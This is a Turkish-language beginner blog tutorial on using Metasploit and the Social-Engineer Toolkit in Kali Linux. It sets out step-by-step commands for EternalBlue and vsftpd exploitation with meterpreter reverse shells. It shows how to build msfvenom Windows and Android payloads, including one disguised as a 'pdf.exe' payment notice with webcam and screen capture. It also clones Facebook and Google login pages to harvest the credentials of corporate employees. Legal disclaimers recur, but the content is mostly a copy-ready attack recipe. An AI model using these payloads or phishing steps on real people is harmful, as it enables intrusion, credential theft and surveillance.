Shopping Cart
Total:

$0.00

Items:

0

Checkout View Cart
Your cart is empty
Keep Shopping

💻 Metasploit Nedir? Kali Linux’ta Yeni Başlayanlar İçin Uygulamalı Rehber -1

BÖLÜM 1

Siber güvenlik dünyasına yeni adım attınız ve Metasploit ismini duydunuz. Peki bu güçlü araç nedir, nasıl kullanılır ve nereden başlanmalı?

Bu yazıda, Linux geçmişi olmayanlar için adım adım Kali Linux üzerinde Metasploit Framework kullanmayı öğreteceğiz. Basit bir ağ taraması yapacak, açık bulacak ve örnek bir saldırı simülasyonu gerçekleştireceğiz.

Metasploit Nedir?, siber güvenlik alanında sistem açıklarını bulmak, analiz etmek ve test etmek amacıyla kullanılan en güçlü araçlardan biridir. Kali Linux ile entegre çalışan bu framework, etik hacker’lar ve güvenlik uzmanları tarafından yaygın olarak kullanılır. Bu rehberde, Linux bilgisi olmayan birinin bile kolaylıkla kullanabileceği şekilde Metasploit’i A’dan Z’ye öğreneceksiniz.

🔍 Metasploit Framework Nedir?

Metasploit, etik hackerların, güvenlik araştırmacılarının ve penetrasyon test uzmanlarının sistem açıklarını bulmak ve test etmek için kullandığı bir araçtır. İçerisinde binlerce:



  • Exploit (güvenlik açığını sömüren kod)

  • Payload (hedef sistemde çalışan yük)

  • Scanner (ağ tarayıcıları)

  • Post-Exploitation (istismar sonrası araçlar)


bulunur.

Kali Linux’ta Metasploit: Başlangıçtan İleri Seviye Exploit Geliştirmeye Kadar Her Şey

Metasploit Framework, etik hackerlık, sızma testi ve siber güvenlik öğrenmek isteyenler için vazgeçilmez bir araçtır. Ancak bu dünyaya ilk kez adım atan biriyseniz, Kali Linux’u bile açmak göz korkutucu olabilir. Endişelenmeyin! Bu yazı, Linux geçmişi olmayan kişiler için sade ama teknik doğrulukla yazılmış bir rehberdir.

Bu uzun anlatımda şunları öğreneceksiniz:

✅ Metasploit nedir, nasıl kurulur ve çalıştırılır
✅ Exploit, payload ve auxiliary farkları
✅ Temel tarama işlemleri ve açık bulma
✅ Meterpreter oturumu alma
✅ Sosyal mühendislik saldırıları ve SET Toolkit kullanımı
✅ Sahte web siteleriyle parola toplama
✅ Android cihazlara yönelik saldırı simülasyonları
✅ Kendi exploit’inizi yazmaya giriş
✅ Ve en önemlisi: Etik kurallar ve yasal uyarılar

🧠 Metasploit Nedir?

Metasploit Framework, açık kaynak kodlu bir penetrasyon test aracıdır. Temel amacı sistemlerdeki güvenlik açıklarını tespit edip bu açıklara karşı saldırı simülasyonu yapmaktır. Yani kötü niyetli bir hacker’ın yapabileceği her şeyi yasal ve etik sınırlar içinde test etmenizi sağlar.

İçeriğinde şunlar bulunur:

  • Exploit: Güvenlik açığını istismar eden kod.
  • Payload: Açığı kullandıktan sonra hedefe gönderilen kod.
  • Auxiliary: Tarama ve bilgi toplama modülleri.
  • Post: Hedefe sızdıktan sonraki işlemleri yöneten modüller.

Metasploit, Ruby diliyle yazılmıştır ve Kali Linux içinde önceden kurulu olarak gelir.

🔧 Kali Linux’ta Metasploit’i Açmak

Kali Linux terminalini açın ve şu komutu yazın:

nginxKopyalaDüzenlemsfconsole

İlk çalıştırma biraz uzun sürebilir. Açıldığında sizi şu mesaj karşılar:

diffKopyalaDüzenle=[ metasploit v6.x.x ]
+ -- --=[ 2000+ exploits - 500+ payloads ]
msf6 >

İşte karşınızda Metasploit konsolu. Artık komutlarla modülleri arayabilir, ayarlayabilir ve testleri başlatabilirsiniz.

📦 Exploit, Payload ve Auxiliary Nedir?

Bu üç kavramı karıştırmak çok yaygındır. Basitçe açıklayalım:

  • Exploit: Sistem ya da yazılım üzerindeki zayıf noktayı kullanmak için geliştirilmiş koddur. Örnek: ms17_010_eternalblue.
  • Payload: Exploit başarılı olursa sisteme gönderilen “yük”tür. Örnek: meterpreter/reverse_tcp.
  • Auxiliary: Ağ taraması, servis bilgisi toplama gibi saldırı öncesi destek araçlarıdır. Örnek: scanner/portscan/tcp.

Kısaca, “Auxiliary ile hedefi tanırız, Exploit ile kapıyı kırarız, Payload ile içeri gireriz.”

🔍 Hedef Taraması: Açıkları Bulmak

Önce hedef IP adresini belirleyelim. Genelde test için kendi ağınızda bir sanal makine kullanmanız önerilir.

Şu örnek komutla TCP port taraması yapalım:

arduinoKopyalaDüzenleuse auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.10
run

Açık portları gördükten sonra buna uygun bir exploit arayabiliriz:

sqlKopyalaDüzenlesearch vsftpd

Bu komut, FTP servisinde bilinen açıklıkları listeler.

🎯 Exploit ve Payload Kullanımı

Örnek bir saldırı simülasyonu yapalım: vsftpd_234_backdoor exploit’i ile hedef sistemde bir komut satırı elde edelim.

bashKopyalaDüzenleuse exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.10
set RPORT 21
set PAYLOAD cmd/unix/interact
exploit

Eğer her şey yolundaysa, artık hedef sistemde bir shell (komut ekranı) açılmış olur.

🧪 Meterpreter Nedir ve Ne Yapar?

Metasploit’in en güçlü bileşenlerinden biri Meterpreter’dir. Bir payload türüdür ve hedef sisteme sızdıktan sonra şu işlemleri yapabilir:

  • Dosya yükleme/indirme
  • Ekran görüntüsü alma
  • Mikrofon açma
  • Komut çalıştırma
  • Arka kapı bırakma

Örnek:

bashKopyalaDüzenleuse exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.20
set LHOST 192.168.1.5
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
exploit

Başarılı olursa:

nginxKopyalaDüzenleMeterpreter session 1 opened

Ve artık komutlar şu şekilde yazılır:

nginxKopyalaDüzenlemeterpreter > screenshot
meterpreter > shell

🕵️ Sosyal Mühendislik Nedir?

Sosyal mühendislik, insan zaaflarını kullanarak sistemlere sızma yöntemidir. Teknik bilgi yerine manipülasyon kullanılır. Örnekler:

  • “Şirket içi güncelleme” diyerek parola toplama
  • Sahte fatura e-postaları
  • WhatsApp veya e-Devlet gibi gözüken sahte siteler

Bu saldırı türünü Kali Linux’ta “SET Toolkit” ile uygulayabilirsiniz.

🎣 SET Toolkit ile Sahte Site Kurulumu

SET (Social Engineering Toolkit) Kali’de önceden kurulu gelir. Terminale şu komutu yazın:

nginxKopyalaDüzenlesetoolkit

Açıldığında menüden şunu seçin:

mathematicaKopyalaDüzenle1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method

Hedef web sitesini klonlayarak (örneğin Facebook) kendi IP’nizden sahte bir sayfa sunabilirsiniz. Kullanıcı e-posta ve şifresini girerse bu bilgiler terminale düşer.

Örnek kurulum akışı:

📌 Not: Bu işlem yalnızca laboratuvar ortamında denenmelidir. Gerçek kişilere uygulanması yasa dışıdır!

📱 Android Cihazlara Yönelik Payload Oluşturma

Android cihazlar da hedef alınabilir. Örnek bir APK payload:

nginxKopyalaDüzenlemsfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -o hack.apk

Bu dosya kurulduğunda, Metasploit terminalinizde bir meterpreter oturumu açar.

Listener başlatmak için:

bashKopyalaDüzenleuse exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
exploit

🛠️ Kendi Exploit’ini Yazmaya Giriş

Exploit geliştirmek ileri seviye bir iştir ama temel mantığı anlamak önemlidir. Basit bir Python örneği:

pythonKopyalaDüzenleimport socket

ip = "192.168.1.10"
port = 80
payload = "A" * 2000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(payload.encode())
s.close()

Bu kod, belirttiğiniz IP ve port’a 2000 karakterlik veri gönderir. Eğer hedef uygulama buffer overflow’a açıksa çöker.

⚖️ Etik Kurallar ve Yasal Uyarı

Metasploit ve benzeri araçlar yalnızca:

  • Kendi cihazlarınızda
  • Laboratuvar ortamlarında
  • Yazılı izin aldığınız sistemlerde

kullanılmalıdır.

İzinsiz kullanımı Türkiye’de Bilişim Suçları Kanunu kapsamında hapis cezasına tabidir.

🛠️ Kali Linux’ta Metasploit Alıştırmaları

Kali Linux, Metasploit’i önceden yüklenmiş olarak sunar. Kullanmak için terminale şu komutu girin:

msfconsole

İlk çalıştırmada birkaç dakika sürebilir. Açıldığında sizi şu şekilde karşılar:

       =[ metasploit v6.3.4-dev]
+ -- --=[ 2344 exploits - 1200 auxiliary - 450 payloads ]
msf6 >

Tebrikler! Artık Metasploit konsolundasınız. Tüm komutlar msf6 > satırına yazılır.

📌 Komut Yapısı ve Yardım Almak

Basit bir komutla yardım alabilirsiniz:

help

Ana komutlar:

  • search: Modül arar
  • use: Bir modülü seçer
  • show options: Modül ayarlarını gösterir
  • set: Ayar belirler
  • run / exploit: İşlemi başlatır

🔎 Örnek: Basit Ağ Tarama (Port Scanner)

İlk olarak hedef bir IP belirleyelim. Örnek olarak yerel ağdaki bir bilgisayarı tarayacağız. Şu komutları yazın:

search portscan
use auxiliary/scanner/portscan/tcp
show options
set RHOSTS 192.168.1.10
run

Bu işlem, 192.168.1.10 IP adresindeki açık TCP portları tarar.

🎯 Exploit Seçimi ve Payload Ayarı

Hedef sistemdeki açıklığı bulduktan sonra örnek bir exploit kullanabiliriz. Örneğin, vsftpd adlı FTP yazılımının bir açığını kullanalım:

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.1.10
set RPORT 21
set PAYLOAD cmd/unix/interact
run

Bu, hedef sistemde bir “shell” (komut ekranı) açar. Hedef sistemde komut çalıştırabilirsiniz.

🧠 Payload Nedir?

Payload, hedef sisteme “yerleşen” koddur. En popüler olanı meterpreter‘dir. Güçlüdür çünkü:

  • Ekran görüntüsü alabilir
  • Dosya indirebilir/yükleyebilir
  • Mikrofon açabilir
  • Kalıcı arka kapı kurabilir

Örnek kullanım:

use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
exploit

Hedef sistem açığa sahipse, size meterpreter oturumu verir:

meterpreter >

🎬 Özet Senaryo

Senaryo: Yerel ağdaki Windows 7 bilgisayarı SMB açığına karşı test edin.

Adımlar:

  1. search ms17_010
  2. use exploit/windows/smb/ms17_010_eternalblue
  3. set RHOSTS 192.168.1.7
  4. set PAYLOAD windows/meterpreter/reverse_tcp
  5. set LHOST 192.168.1.5
  6. exploit

Başarılıysa şu mesajı alırsınız:

Meterpreter session 1 opened

Artık hedef sistemde tam kontrol sizde.

✅ Güvenlik Notu

Metasploit yalnızca izinli testlerde, kendi sistemlerinizde ya da laboratuvar ortamlarında kullanılmalıdır. Gerçek sistemlere izinsiz saldırmak yasal suçtur.

🔚 Sonuç

Metasploit, ilk bakışta karmaşık görünse de temel komutları öğrenerek ağ taraması, exploit çalıştırma ve payload yönetimi gibi işlemleri hızlıca yapabilirsiniz. Kali Linux ile birlikte kullanıldığında, öğrenme süreci hem hızlı hem de eğitici olur. Biraz pratikle siz de etik hacker yolculuğunuza sağlam bir adım atabilirsiniz.

💻 Metasploit ile Kali Linux’ta Etik Hacking: Sıfırdan Sosyal Mühendisliğe

Bu yazı, Kali Linux kullanan ancak daha önce Linux veya siber güvenlik deneyimi olmayanlar için Metasploit Framework‘ü adım adım öğreten bir eğitim rehberidir. Yazının ilk bölümünde temel kavramları öğrendik: tarama, exploit seçimi, payload yükleme ve meterpreter kullanımı. Şimdi bu bilgileri bir adım ileri taşıyoruz. Hedefimiz: sosyal mühendislik saldırılarını simüle etmek, özel payloadlar üretmek ve SET Toolkit gibi güçlü sılahları kullanmak.

🌍 Sosyal Mühendislik Nedir?

Sosyal mühendislik, teknolojik sistemlerden çok insan zaafiyetlerini hedef alan saldırı türüdür. En güzel örneği: bir çalışanın kandırılıp p \u015ifrelerini söylemesi veya sahte bir giriş sayfasına bilgilerini yazmasıdır. Bu teknikler, Metasploit ile uygulanabilir, test edilebilir ve önlenebilir.

🚀 SET Toolkit Kurulumu (Sosyal Mühendislik Aracı)

SET, yani Social-Engineer Toolkit, Metasploit ile entegre çalışan, sahte siteler oluşturabilen ve kimlik avı testleri yapmanızı sağlayan bir yazılımdır.

sudo apt update && sudo apt install set

Kurulduktan sonra şu komutla çalıştırılır:

sudo setoolkit

Karşınıza çıkan menüyü kullanarak “1) Social-Engineering Attacks” → “2) Website Attack Vectors” → “3) Credential Harvester Attack Method” şeklinde ilerleyin.

✨ Sahte Giriş Sayfası Kurmak

Örneğin, bir kullanıcının sahte Facebook sayfasına girmesini simüle etmek istiyoruz. SET, bizden bir IP ister:

[*] Enter the IP address to harvest credentials: 192.168.1.5

Sonra “Facebook” seçildiğinde, Kali Linux içinde /var/www/html klasörüne sahte sayfa yerleştirilir. Kullanıcı bu sayfaya girdiğinde bilgileri harvester.log dosyasına kaydolur.

🔨 Metasploit ile Özel Payload Üretme

Bir .exe dosyası gibi görünen ama aslında meterpreter oturumu bağlayan bir dosya oluşturmak için msfvenom kullanılır:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > payload.exe

Bu dosya hedef sisteme ulaştığında, Kali Linux’taki Metasploit ile haberleşir. Dinleyici ayarlamak için:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
run

Hedef çalıştırdığında meterpreter > bağlantısı gelir.

🧰 Gerçekçi Senaryo: Sahte PDF ile Erişim

Senaryo: Bir kurumsal çalışana “Ödeme Bildirimi.pdf.exe” adlı dosya gönderilir. Dosya aslında özel msfvenom payloadıdır. Çalıştığı anda Kali Linux’taki Metasploit oturum bağlanır ve şu komutlar mümlüdür:

  • sysinfo: Hedef sistem bilgilerini gör
  • screenshare: Canlı ekran izle
  • webcam_snap: Kamera fotoğrafı al
  • upload, download: Dosya al/ver

Bu tür simülasyonlar için etik kurallar çok önemlidir.

⚡ Etik ve Yasal Uyarı

Bu yazı sadece eğitim amaçlıdır. Metasploit, SET Toolkit, payload üretimi gibi tüm uygulamalar yalnızca izinli ortamlarda, laboratuvar/test sistemlerinde kullanılmalıdır. Gerçek kişilerin sistemlerine izinsiz erişim, TCK’ya göre suçtur ve hapis cezası vardır.

📚 Metasploit ile Etik Hackerlığa Giriş

Artık Metasploit ile tarama yapmayı, exploit seçmeyi, payload üretmeyi, meterpreter kullanmayı ve sosyal mühendislik senaryolarını simüle etmeyi öğrendiniz. Bir etik hacker’ın sahip olması gereken becerilerin temelini attınız.

Sonraki adım için tavsiyemiz: OWASP Top 10 açık listesi üzerinden gerçek web uygulamalarına karşı zafiyet taraması yapmak ve Metasploit’in web modülerini test etmektir.

📡 Metasploit ile Sosyal Mühendislik Saldırıları ve SET Toolkit Kullanımı (Devam)

Metasploit’in yalnızca teknik açıkları kullanarak değil, sosyal mühendislik yöntemleriyle de hedef sistemlere erişim sağlayabileceğini biliyor muydunuz? Bu yazının devamında, Kali Linux üzerinde yer alan SET (Social Engineering Toolkit) aracını nasıl kullanacağınızı adım adım öğreneceksiniz. Teknik bilgisi sınırlı olanlar için sade, ama uzmanlık yolunda etkili bir içerik olacak.

⚡ Sosyal Mühendislik Nedir?

Sosyal mühendislik, hedef kişilerin davranışlarını manipüle ederek sistemlerine sızma yöntemidir. Yani, teknolojiye değil, insanlara saldırır. En bilinen sosyal mühendislik teknikleri:

  • Phishing (oltalama): Sahte e-posta ya da siteyle şifre toplama
  • Pretexting: Yanlış senaryo ile bilgi alma
  • Baiting: Zararlı yazılım taşıyan cihazlar bırakmak
  • Impersonation: Önemli bir kişi gibi davranma

Bu yöntemler, teknik açıklardan daha etkili olabilir. Özellikle kurum içi kullanıcılar zayıf halka olabilir.

🤖 SET Toolkit Nedir, Nasıl Çalışır?

SET (Social Engineering Toolkit), Dave Kennedy tarafından geliştirilmiş, Metasploit ile entegre çalışan bir sosyal mühendislik aracıdır. Kali Linux içinde ön tanımlı olarak gelir. Konsoldan başlatmak için:

sudo setoolkit

Komut verildiğinde, menü bazlı bir arayüz açılır. Ana menüde şu seçenekler bulunur:

  1. Social-Engineering Attacks
  2. Penetration Testing (Fast-Track)
  3. Third Party Modules
  4. Update SET

SET menülerinde her İşlem numarayla yönetilir. Bu da komut bilgisi az olanlar için çok kolaylık sağlar.

🌐 Sahte Web Sitesi ile Bilgi Toplama (Credential Harvester)

En sık kullanılan senaryolardan biri: “Fake Login Page” ile kullanıcıdan şifre toplamak. Aşağıdaki adımlar izlenerek kolayca uygulanabilir:

  1. sudo setoolkit
  2. Seçenek 1: Social-Engineering Attacks
  3. Seçenek 2: Website Attack Vectors
  4. Seçenek 3: Credential Harvester Attack Method
  5. Seçenek 2: Site Cloner

Sistem sizden hedef sitedeki orijinal URL’yi ister. Örnek olarak:

Hedef URL: https://accounts.google.com
IP adresiniz: 192.168.1.5

SET, bu sitedeki görünümü klonlar ve arka planda şu yolu izler:

/var/www/html/post.php

Kullanıcı sahte sayfaya bilgilerini girdiğinde, bu bilgiler bu dizine kaydedilir. Apache aktifse, bu site aynı IP adresiyle erişilebilir olur. Not: Kali’de Apache’yi başlatmak için:

sudo systemctl start apache2

🧵 Gerçekçi Bir Saldırı Senaryosu: Google Girişi

Senaryo: Kurum çalışanlarının e-postalarına erişim için, onlara “güvenlik kontrolü” bahanesiyle sahte Google giriş sayfası gönderiyoruz.

  1. SET üzerinden site klonlanır.
  2. Link bir e-posta ile “Hesabınız risk altında!” mesajıyla gönderilir.
  3. Kullanıcı tıkladığında, gerçek sayfa gibi gözüken ama sahte sayfa açılır.
  4. E-posta ve şifre girildiğinde bilgiler txt dosyasına yazılır.

⛔️ Etik Kurallar ve Yasal Sınırlar

Sosyal mühendislik son derece etkili ama aynı zamanda tehlikeli bir tekniktir. Bu araçlar:

  • SADECE izinli sistemlerde,
  • LAB ortamında,
  • Eğitim amaçlı kullanılmalıdır.

Gerçek kişilerin bilgilerinin izinsiz toplanması, TCK 243-245 sayılı kanunlara göre SUÇTUR. Her zaman etik olun.

🌟 Metasploit + Sosyal Mühendislik = Çok Yönlü Testler

Metasploit sadece teknik exploitlerle değil, insan davranışlarını manipüle ederek de test yapmanıza olanak tanır. SET Toolkit, bu alandaki en kullanışlı yardımcılardan biridir. Bu yazı ile hem terminal kullanma becerinizi geliştirmiş oldunuz hem de hacker mantığının temellerine bir adım daha attınız.

0
Show Comments (0) Hide Comments (0)
0 0 votes
Article Rating
Subscribe
Bildir
guest
0 Yorum
Eskiler
En Yeniler Beğenilenler
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x